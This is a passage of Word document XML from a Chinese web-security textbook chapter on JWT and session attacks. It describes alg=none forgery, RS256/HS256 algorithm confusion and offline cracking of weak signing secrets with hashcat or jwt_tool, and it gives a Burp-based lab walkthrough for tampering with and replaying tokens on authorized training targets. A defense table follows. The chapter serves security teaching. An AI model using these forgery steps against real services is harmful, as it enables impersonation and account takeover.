        <w:t xml:space="preserve">早期某些版本在未限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> algorithm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的情况下会回退到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">none），它便会直接接受该伪造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">token。这在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验挑战中是一个基础攻防项。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二类误用是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对称密钥弱签名与密钥混淆</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">支持对称算法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HMAC-SHA256）和非对称算法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RS256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名）。一个重要但常被后端开发者忽视的事实是：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RS256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式下，验证签名的公钥是公开或可通过常规渠道获取的；如果服务端未锁定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">白名单，攻击者可将算法改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并将公钥直接作为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HMAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的对称密钥使用。因为服务端的验证代码在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径下会将持有密钥（此时即为公开的公钥）用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HMAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">校验，攻击者就能用该公钥为自己捏造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成有效签名。这一攻击被称为“算法混淆”（Algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Confusion），其在纵深层面暴露的是代码对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库的调用未遵循最小权限原则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">必须显式声明允许的算法集合（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">algorithms=["RS256"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">），对传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">头采取白名单匹配，而不是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱签名还体现在密钥长度不足——如某些开发或演示环境使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这样的弱密钥对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名。攻击者一旦获得一个合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT，即可离线使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat（模式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16500 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT，详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt_tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的字典模式进行爆破。一旦恢复出签名密钥，攻击者便可以在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有效期内随意颁发任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">token。这一过程不需要网络交互，绕过一切速率限制和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MFA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">措施。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="198"/>
    <w:bookmarkStart w:id="199" w:name="会话攻击的授权靶机实操补充"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话攻击的授权靶机实操补充</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的会话固定与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">挑战在默认安装中尚不够系统，但在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“CSRF”与“XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(Stored)”等模块中，有经验的演练者可以将跨站请求与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为结合起来体会会话固定的前提条件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传递</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防的系统性实验，强烈建议读者完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列实验（属于免费在线授权环境</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②），其环境涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">算法、弱密钥签名到算法混淆的完整阶梯。在授权靶机上对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">令牌进行改包与重放的通用实操步骤（使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Repeater </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON Web Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">插件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）如下：①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截到一次包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的授权请求（通常在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;JWT&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头中）；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解码（Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">插件或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt.io</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在线解码器，需注意不要在公网平台解码真正敏感的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">token，此处指靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）；③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（subject）标识，并尝试发送。预期在安全配置严格的靶机上应返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">401 Unauthorized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而在脆弱配置（教学靶机）中则可能成功返回本该受保护的资源——这表明已伪造身份通过验证。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="199"/>
    <w:bookmarkStart w:id="200" w:name="防御对照框会话安全与-jwt-加固"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：会话安全与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加固</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防御措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">强制会话轮换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">登录成功后立刻重新生成</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Session </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">ID，并令旧</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">无效；即使某次点击携带了预置的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">SID，它也不会用于已认证的上下文。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">安全属性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">设置</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（仅</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HTTPS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">传输）、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">HttpOnly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（禁止</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> JavaScript </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">读取）、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SameSite=Lax/Strict</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（防</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">CSRF，详见第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">JWT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">算法白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在服务端</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> JWT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">校验代码中显式指定允许的算法列表，拒绝</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> token </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
